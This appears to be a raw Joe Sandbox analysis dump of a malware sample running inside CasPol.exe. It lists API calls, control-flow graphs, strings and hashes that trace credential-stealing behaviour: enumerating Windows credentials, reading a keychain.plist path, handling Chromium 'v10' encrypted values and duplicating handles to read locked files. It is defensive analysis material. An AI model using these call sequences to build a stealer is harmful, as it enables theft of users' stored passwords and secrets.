                                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                • API String ID: 708747863-3398334509
                                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                APIs
                                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                • free.MSVCRT ref: 00418803
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                • String ID:
                                                                                                • API String ID: 1355100292-0
                                                                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$FirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 1690352074-0
                                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0041898C
                                                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoSystemmemset
                                                                                                • String ID:
                                                                                                • API String ID: 3558857096-0
                                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 004455C2
                                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                                • memset.MSVCRT ref: 0044570D
                                                                                                • memset.MSVCRT ref: 00445725
                                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                • memset.MSVCRT ref: 0044573D
                                                                                                • memset.MSVCRT ref: 00445755
                                                                                                • memset.MSVCRT ref: 004458CB
                                                                                                • memset.MSVCRT ref: 004458E3
                                                                                                • memset.MSVCRT ref: 0044596E
                                                                                                • memset.MSVCRT ref: 00445A10
                                                                                                • memset.MSVCRT ref: 00445A28
                                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                • memset.MSVCRT ref: 00445B52
                                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                • memset.MSVCRT ref: 00445B82
                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                • memset.MSVCRT ref: 00445986
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                • API String ID: 2263259095-3798722523
                                                                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                • API String ID: 2744995895-28296030
                                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                                • memset.MSVCRT ref: 0040B756
                                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                • memset.MSVCRT ref: 0040B851
                                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                                • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                • String ID: chp$v10
                                                                                                • API String ID: 4165125987-2783969131
                                                                                                • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 004091E2
                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                • String ID:
                                                                                                • API String ID: 3715365532-3916222277
                                                                                                • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 free 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 600 413e6a-413e76 596->600 597->596 602 413e46-413e5c GetProcAddress 597->602 598->599 599->580 600->592 602->596 604->583
                                                                                                APIs
                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                • memset.MSVCRT ref: 00413E07
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                • free.MSVCRT ref: 00413EC1
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                • API String ID: 1344430650-1740548384
                                                                                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                • String ID: bhv
                                                                                                • API String ID: 4234240956-2689659898
                                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
